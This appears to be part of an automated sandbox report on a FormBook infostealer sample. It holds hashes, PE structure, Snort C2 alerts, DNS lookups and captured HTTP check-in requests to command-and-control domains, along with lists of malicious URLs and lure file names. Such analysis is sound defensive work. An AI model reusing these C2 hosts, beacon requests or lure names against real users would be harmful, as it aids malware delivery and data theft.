	http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDefjjvAc1VCRhzhBKQTVpjzhejQ8Rhu1zO1vWGAUfUeULJrKwFSbIOyWIUfIv-2Flo3yTYESP-2B78w2V31KWz3gTVG4x9fJGaMxyv5FQX0-2FC02SNh0q62WGV8moxgoMPN13ug-3D-3D0M2T_RK3E7lcHJh6RzNRog0V2Ww4F1i1LQS7pYYmvozE9BtFWFH8CBc2C7lCJRjsdH3VwNbJDjo91Q5gKMT9cCcdXw8AkweIV-2FNLnytbk6yO5x98zOjWQvldOWLzS2kOJk-2Bc9a9xwBmgqVDiuxw1Lx4HAzZ-2Bjhc2IjRsVwgsa2WyKs6mVKScqAKEYCpz9uhwD3RMPm3P4ijESTEtLH2hoAVbwO9XnUT-2BT6XJFuujR9hf41ZQ-3D	Get hash	malicious	HTMLPhisher	Browse	3.233.52.245
	https://teamfahad.com/fcilender/Untitled/?id=293bn5&p=page_1&c=1	Get hash	malicious	Unknown	Browse	100.24.180.144
	https://teamfahad.com/fcilender/Untitled/?id=293bn5&p=page_1&c=1	Get hash	malicious	Unknown	Browse	50.17.171.220
	https://indd.adobe.com/view/2bab4c20-5db8-4df4-abb1-5e8820aa4ec8	Get hash	malicious	Unknown	Browse	34.193.227.236
TWENTYIGB	kpCSGLBxAw2RnrW.exe	Get hash	malicious	FormBook	Browse	185.151.30.212
	ORDEN DE COMPRA URGENTEsxlx..exe	Get hash	malicious	FormBook	Browse	185.151.30.199
	BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exe	Get hash	malicious	FormBook	Browse	185.151.30.199
	BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exe	Get hash	malicious	FormBook	Browse	185.151.30.199
	cca9sXT33VsAEdu.exe	Get hash	malicious	FormBook	Browse	185.151.30.212
	z26PEDIDODECOMPRAURGENTE___s___x___l___x____.exe	Get hash	malicious	FormBook	Browse	185.151.30.199
	ORDEN DE COMPRAs#U034fx#U034fl#U034fx#U034f..exe	Get hash	malicious	FormBook	Browse	185.151.30.199
	MUESTRA DE ORDEN DE COMPRA pdf.exe	Get hash	malicious	FormBook	Browse	185.151.30.199
	DRAFT 99577590.exe	Get hash	malicious	FormBook	Browse	185.151.30.215
	DEBIT NOTE.exe	Get hash	malicious	FormBook	Browse	185.151.30.215
TEAMINTERNET-ASDE	Cheat.malware_exe.exe	Get hash	malicious	Unknown	Browse	185.53.177.31
	Cheat.malware_exe.exe	Get hash	malicious	Unknown	Browse	185.53.177.31
	2024 Lusail Fence-WITH STICKER-2-003.exe	Get hash	malicious	FormBook	Browse	185.53.179.91
	DHL AWB DOCUMENT.pdf.exe	Get hash	malicious	FormBook	Browse	185.53.179.93
	yq5xNPpWCT.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	185.53.177.112
	Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe	Get hash	malicious	FormBook	Browse	185.53.179.92
	DHL ARRIVAL DOCUMENTS.pdf.exe	Get hash	malicious	FormBook	Browse	185.53.179.90
	Mbabane.exe	Get hash	malicious	FormBook	Browse	185.53.178.13
	http://protect.dscsec.com/software.htm	Get hash	malicious	HTMLPhisher	Browse	185.53.179.29
	TT-SWIFT-Schindler.exe	Get hash	malicious	FormBook	Browse	185.53.179.90

Process:	C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.931221851029129
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	mQY9ka5sW6hv2Ri.exe
File size:	598'016 bytes
MD5:	e97620420d37596704d9f4fa70303453
SHA1:	533b98b289ba07c446f8350950fdbee2ab39dcf2
SHA256:	a5a3067e6a3c4e957152655df5c68ce4db77f8308feff43c53e7535031033be5
SHA512:	a5ee774c492216568a9c16768cf83188cc261e1f4888cbe4aff9717bc13bccade2594ffe04bac35367213e8b3288e2671841320d529aa5f5a168e1756c6c7ed3
SSDEEP:	12288:wanv6lRPM97SMRgqbFwWAEY/Z1NJQtUa2e0szSoMXGjxbFtACUYsOl7n9W1ei:5IRombqbFwWrYn7Q32e0GSUptACOOBn9
TLSH:	5BD423B232789DA7CEBCAAF9046A006403F1E75605A2FBD80CCA71C54AF2F546D15B5F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0...... ......6.... ... ....@.. .......................`............@................................

File Icon


Icon Hash:	6145b2b1e4a4b186

Static PE Info

General

Entrypoint:	0x491036
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6682C0CD [Mon Jul 1 14:44:29 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x90fe4	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x92000	0x16b4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x94000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x8f03c	0x8f800	082b578777ea3fbd6c92cdde6868eeb2	False	0.9496049515461672	data	7.955074705738379	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x92000	0x16b4	0x1800	cebf23dec9a125a231b630f9d15503c1	False	0.8045247395833334	data	7.038111676306673	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x94000	0xc	0x800	7700f3fa5c5782e102878dddfdedc467	False	0.015625	data	0.03037337037012526	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x920c8	0x129f	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9418921753723516
RT_GROUP_ICON	0x93378	0x14	data	1.05
RT_VERSION	0x9339c	0x312	data	0.43765903307888043

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/01/24-21:26:17.877094	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49743	80	192.168.2.4	3.226.182.14
07/01/24-21:25:38.909975	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49741	80	192.168.2.4	185.53.179.90
07/01/24-21:28:41.127357	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49748	80	192.168.2.4	147.92.43.172
07/01/24-21:26:37.917250	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49744	80	192.168.2.4	3.33.130.190
07/01/24-21:27:39.306121	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49746	80	192.168.2.4	185.151.30.212
07/01/24-21:28:20.132765	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49747	80	192.168.2.4	3.33.130.190
07/01/24-21:26:58.313160	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49745	80	192.168.2.4	104.21.74.89

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 1, 2024 21:25:38.882427931 CEST	49741	80	192.168.2.4	185.53.179.90
Jul 1, 2024 21:25:38.892579079 CEST	80	49741	185.53.179.90	192.168.2.4
Jul 1, 2024 21:25:38.892757893 CEST	49741	80	192.168.2.4	185.53.179.90
Jul 1, 2024 21:25:38.909975052 CEST	49741	80	192.168.2.4	185.53.179.90
Jul 1, 2024 21:25:38.915021896 CEST	80	49741	185.53.179.90	192.168.2.4
Jul 1, 2024 21:25:39.403903961 CEST	49741	80	192.168.2.4	185.53.179.90
Jul 1, 2024 21:25:39.422168970 CEST	80	49741	185.53.179.90	192.168.2.4
Jul 1, 2024 21:25:39.422297001 CEST	49741	80	192.168.2.4	185.53.179.90
Jul 1, 2024 21:26:17.871835947 CEST	49743	80	192.168.2.4	3.226.182.14
Jul 1, 2024 21:26:17.876894951 CEST	80	49743	3.226.182.14	192.168.2.4
Jul 1, 2024 21:26:17.876981020 CEST	49743	80	192.168.2.4	3.226.182.14
Jul 1, 2024 21:26:17.877094030 CEST	49743	80	192.168.2.4	3.226.182.14
Jul 1, 2024 21:26:17.881968975 CEST	80	49743	3.226.182.14	192.168.2.4
Jul 1, 2024 21:26:18.387938976 CEST	49743	80	192.168.2.4	3.226.182.14
Jul 1, 2024 21:26:18.391942978 CEST	80	49743	3.226.182.14	192.168.2.4
Jul 1, 2024 21:26:18.392016888 CEST	49743	80	192.168.2.4	3.226.182.14
Jul 1, 2024 21:26:18.392467022 CEST	80	49743	3.226.182.14	192.168.2.4
Jul 1, 2024 21:26:18.392530918 CEST	49743	80	192.168.2.4	3.226.182.14
Jul 1, 2024 21:26:18.393131018 CEST	80	49743	3.226.182.14	192.168.2.4
Jul 1, 2024 21:26:18.393181086 CEST	49743	80	192.168.2.4	3.226.182.14
Jul 1, 2024 21:26:37.911322117 CEST	49744	80	192.168.2.4	3.33.130.190
Jul 1, 2024 21:26:37.917150974 CEST	80	49744	3.33.130.190	192.168.2.4
Jul 1, 2024 21:26:37.917207003 CEST	49744	80	192.168.2.4	3.33.130.190
Jul 1, 2024 21:26:37.917249918 CEST	49744	80	192.168.2.4	3.33.130.190
Jul 1, 2024 21:26:37.921994925 CEST	80	49744	3.33.130.190	192.168.2.4
Jul 1, 2024 21:26:38.403681040 CEST	49744	80	192.168.2.4	3.33.130.190
Jul 1, 2024 21:26:38.409198046 CEST	80	49744	3.33.130.190	192.168.2.4
Jul 1, 2024 21:26:38.409255028 CEST	49744	80	192.168.2.4	3.33.130.190
Jul 1, 2024 21:26:58.308027983 CEST	49745	80	192.168.2.4	104.21.74.89
Jul 1, 2024 21:26:58.312997103 CEST	80	49745	104.21.74.89	192.168.2.4
Jul 1, 2024 21:26:58.313066006 CEST	49745	80	192.168.2.4	104.21.74.89
Jul 1, 2024 21:26:58.313159943 CEST	49745	80	192.168.2.4	104.21.74.89
Jul 1, 2024 21:26:58.318274021 CEST	80	49745	104.21.74.89	192.168.2.4
Jul 1, 2024 21:26:58.785769939 CEST	80	49745	104.21.74.89	192.168.2.4
Jul 1, 2024 21:26:58.785890102 CEST	49745	80	192.168.2.4	104.21.74.89
Jul 1, 2024 21:26:58.786778927 CEST	80	49745	104.21.74.89	192.168.2.4
Jul 1, 2024 21:26:58.786824942 CEST	49745	80	192.168.2.4	104.21.74.89
Jul 1, 2024 21:26:58.790723085 CEST	80	49745	104.21.74.89	192.168.2.4
Jul 1, 2024 21:27:39.298504114 CEST	49746	80	192.168.2.4	185.151.30.212
Jul 1, 2024 21:27:39.303378105 CEST	80	49746	185.151.30.212	192.168.2.4
Jul 1, 2024 21:27:39.306005955 CEST	49746	80	192.168.2.4	185.151.30.212
Jul 1, 2024 21:27:39.306121111 CEST	49746	80	192.168.2.4	185.151.30.212
Jul 1, 2024 21:27:39.311003923 CEST	80	49746	185.151.30.212	192.168.2.4
Jul 1, 2024 21:27:39.794282913 CEST	49746	80	192.168.2.4	185.151.30.212
Jul 1, 2024 21:27:39.799664974 CEST	80	49746	185.151.30.212	192.168.2.4
Jul 1, 2024 21:27:39.801662922 CEST	49746	80	192.168.2.4	185.151.30.212
Jul 1, 2024 21:28:20.126894951 CEST	49747	80	192.168.2.4	3.33.130.190
Jul 1, 2024 21:28:20.132664919 CEST	80	49747	3.33.130.190	192.168.2.4
Jul 1, 2024 21:28:20.132728100 CEST	49747	80	192.168.2.4	3.33.130.190
Jul 1, 2024 21:28:20.132765055 CEST	49747	80	192.168.2.4	3.33.130.190
Jul 1, 2024 21:28:20.138263941 CEST	80	49747	3.33.130.190	192.168.2.4
Jul 1, 2024 21:28:20.604612112 CEST	80	49747	3.33.130.190	192.168.2.4
Jul 1, 2024 21:28:20.604778051 CEST	49747	80	192.168.2.4	3.33.130.190
Jul 1, 2024 21:28:20.604943991 CEST	80	49747	3.33.130.190	192.168.2.4
Jul 1, 2024 21:28:20.604990959 CEST	49747	80	192.168.2.4	3.33.130.190
Jul 1, 2024 21:28:20.610156059 CEST	80	49747	3.33.130.190	192.168.2.4
Jul 1, 2024 21:28:41.122200966 CEST	49748	80	192.168.2.4	147.92.43.172
Jul 1, 2024 21:28:41.127084970 CEST	80	49748	147.92.43.172	192.168.2.4
Jul 1, 2024 21:28:41.127357006 CEST	49748	80	192.168.2.4	147.92.43.172
Jul 1, 2024 21:28:41.127357006 CEST	49748	80	192.168.2.4	147.92.43.172
Jul 1, 2024 21:28:41.132184029 CEST	80	49748	147.92.43.172	192.168.2.4
Jul 1, 2024 21:28:41.624218941 CEST	49748	80	192.168.2.4	147.92.43.172
Jul 1, 2024 21:28:41.672955036 CEST	80	49748	147.92.43.172	192.168.2.4
Jul 1, 2024 21:28:41.716923952 CEST	80	49748	147.92.43.172	192.168.2.4
Jul 1, 2024 21:28:41.721663952 CEST	49748	80	192.168.2.4	147.92.43.172

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 1, 2024 21:25:38.795955896 CEST	55183	53	192.168.2.4	1.1.1.1
Jul 1, 2024 21:25:38.881470919 CEST	53	55183	1.1.1.1	192.168.2.4
Jul 1, 2024 21:25:58.779077053 CEST	62420	53	192.168.2.4	1.1.1.1
Jul 1, 2024 21:25:58.793380976 CEST	53	62420	1.1.1.1	192.168.2.4
Jul 1, 2024 21:26:17.700972080 CEST	51651	53	192.168.2.4	1.1.1.1
Jul 1, 2024 21:26:17.871001005 CEST	53	51651	1.1.1.1	192.168.2.4
Jul 1, 2024 21:26:37.890374899 CEST	60715	53	192.168.2.4	1.1.1.1
Jul 1, 2024 21:26:37.910454988 CEST	53	60715	1.1.1.1	192.168.2.4
Jul 1, 2024 21:26:58.280950069 CEST	57601	53	192.168.2.4	1.1.1.1
Jul 1, 2024 21:26:58.303792953 CEST	53	57601	1.1.1.1	192.168.2.4
Jul 1, 2024 21:27:18.742748976 CEST	54125	53	192.168.2.4	1.1.1.1
Jul 1, 2024 21:27:18.842437029 CEST	53	54125	1.1.1.1	192.168.2.4
Jul 1, 2024 21:27:39.265594006 CEST	49972	53	192.168.2.4	1.1.1.1
Jul 1, 2024 21:27:39.295222044 CEST	53	49972	1.1.1.1	192.168.2.4
Jul 1, 2024 21:27:59.654356003 CEST	59171	53	192.168.2.4	1.1.1.1
Jul 1, 2024 21:28:00.351147890 CEST	53	59171	1.1.1.1	192.168.2.4
Jul 1, 2024 21:28:20.082945108 CEST	57130	53	192.168.2.4	1.1.1.1
Jul 1, 2024 21:28:20.098934889 CEST	53	57130	1.1.1.1	192.168.2.4
Jul 1, 2024 21:28:40.473201990 CEST	64867	53	192.168.2.4	1.1.1.1
Jul 1, 2024 21:28:41.121303082 CEST	53	64867	1.1.1.1	192.168.2.4
Jul 1, 2024 21:29:22.529154062 CEST	52070	53	192.168.2.4	1.1.1.1
Jul 1, 2024 21:29:23.530782938 CEST	52070	53	192.168.2.4	1.1.1.1
Jul 1, 2024 21:29:24.468611956 CEST	53	52070	1.1.1.1	192.168.2.4
Jul 1, 2024 21:29:24.468681097 CEST	53	52070	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 1, 2024 21:25:38.795955896 CEST	192.168.2.4	1.1.1.1	0xf0ce	Standard query (0)	www.real-estate-96841.bond	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:25:58.779077053 CEST	192.168.2.4	1.1.1.1	0x7c1d	Standard query (0)	www.taini00.net	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:26:17.700972080 CEST	192.168.2.4	1.1.1.1	0x6304	Standard query (0)	www.sdplat.media	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:26:37.890374899 CEST	192.168.2.4	1.1.1.1	0x36e	Standard query (0)	www.soloparentconnect.com	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:26:58.280950069 CEST	192.168.2.4	1.1.1.1	0x2245	Standard query (0)	www.b0ba138.xyz	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:27:18.742748976 CEST	192.168.2.4	1.1.1.1	0xd888	Standard query (0)	www.imuschestvostorgov.online	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:27:39.265594006 CEST	192.168.2.4	1.1.1.1	0x75e4	Standard query (0)	www.cpuk-finance.com	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:27:59.654356003 CEST	192.168.2.4	1.1.1.1	0xa23a	Standard query (0)	www.acc-pay.top	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:28:20.082945108 CEST	192.168.2.4	1.1.1.1	0x8e5e	Standard query (0)	www.umeshraja.com	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:28:40.473201990 CEST	192.168.2.4	1.1.1.1	0xbdf5	Standard query (0)	www.883106.photos	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:29:22.529154062 CEST	192.168.2.4	1.1.1.1	0xde68	Standard query (0)	www.484844.vip	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:29:23.530782938 CEST	192.168.2.4	1.1.1.1	0xde68	Standard query (0)	www.484844.vip	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 1, 2024 21:25:38.881470919 CEST	1.1.1.1	192.168.2.4	0xf0ce	No error (0)	www.real-estate-96841.bond		185.53.179.90	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:25:58.793380976 CEST	1.1.1.1	192.168.2.4	0x7c1d	Name error (3)	www.taini00.net	none	none	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:26:17.871001005 CEST	1.1.1.1	192.168.2.4	0x6304	No error (0)	www.sdplat.media	reticulated-garbanzo-p6jx8r0u3hbz71yu1pcvzfk0.herokudns.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 1, 2024 21:26:17.871001005 CEST	1.1.1.1	192.168.2.4	0x6304	No error (0)	reticulated-garbanzo-p6jx8r0u3hbz71yu1pcvzfk0.herokudns.com		3.226.182.14	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:26:17.871001005 CEST	1.1.1.1	192.168.2.4	0x6304	No error (0)	reticulated-garbanzo-p6jx8r0u3hbz71yu1pcvzfk0.herokudns.com		23.22.5.68	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:26:17.871001005 CEST	1.1.1.1	192.168.2.4	0x6304	No error (0)	reticulated-garbanzo-p6jx8r0u3hbz71yu1pcvzfk0.herokudns.com		52.21.227.162	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:26:17.871001005 CEST	1.1.1.1	192.168.2.4	0x6304	No error (0)	reticulated-garbanzo-p6jx8r0u3hbz71yu1pcvzfk0.herokudns.com		54.237.159.171	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:26:37.910454988 CEST	1.1.1.1	192.168.2.4	0x36e	No error (0)	www.soloparentconnect.com	soloparentconnect.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 1, 2024 21:26:37.910454988 CEST	1.1.1.1	192.168.2.4	0x36e	No error (0)	soloparentconnect.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:26:37.910454988 CEST	1.1.1.1	192.168.2.4	0x36e	No error (0)	soloparentconnect.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:26:58.303792953 CEST	1.1.1.1	192.168.2.4	0x2245	No error (0)	www.b0ba138.xyz		104.21.74.89	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:26:58.303792953 CEST	1.1.1.1	192.168.2.4	0x2245	No error (0)	www.b0ba138.xyz		172.67.168.2	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:27:18.842437029 CEST	1.1.1.1	192.168.2.4	0xd888	Name error (3)	www.imuschestvostorgov.online	none	none	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:27:39.295222044 CEST	1.1.1.1	192.168.2.4	0x75e4	No error (0)	www.cpuk-finance.com		185.151.30.212	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:28:20.098934889 CEST	1.1.1.1	192.168.2.4	0x8e5e	No error (0)	www.umeshraja.com	umeshraja.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 1, 2024 21:28:20.098934889 CEST	1.1.1.1	192.168.2.4	0x8e5e	No error (0)	umeshraja.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:28:20.098934889 CEST	1.1.1.1	192.168.2.4	0x8e5e	No error (0)	umeshraja.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 1, 2024 21:28:41.121303082 CEST	1.1.1.1	192.168.2.4	0xbdf5	No error (0)	www.883106.photos	wsgb3n6z.as66588.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 1, 2024 21:28:41.121303082 CEST	1.1.1.1	192.168.2.4	0xbdf5	No error (0)	wsgb3n6z.as66588.com	2tduz67r.as66588.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 1, 2024 21:28:41.121303082 CEST	1.1.1.1	192.168.2.4	0xbdf5	No error (0)	2tduz67r.as66588.com		147.92.43.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.real-estate-96841.bond

www.sdplat.media

www.soloparentconnect.com

www.b0ba138.xyz

www.cpuk-finance.com

www.umeshraja.com

www.883106.photos

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49741	185.53.179.90	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 21:25:38.909975052 CEST	170	OUT	GET /dy13/?Cj9LK=8pm41D0p&0N=QEHoM+aYI3hCf+czBdOSz9RRIKYxAFZVZwkeDGKMWY6YfTbawsJCAKRBbAifn9DzIiC0 HTTP/1.1 Host: www.real-estate-96841.bond Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49743	3.226.182.14	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 1, 2024 21:26:17.877094030 CEST	160	OUT	GET /dy13/?Cj9LK=8pm41D0p&0N=ZKZE34nO5+VJCQ7V97/Oxkx+yV2XZDJ4QNe5btj3ut8Iv1OZ3MT37vqx38H3jKbLJXyY HTTP/1.1 Host: www.sdplat.media Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
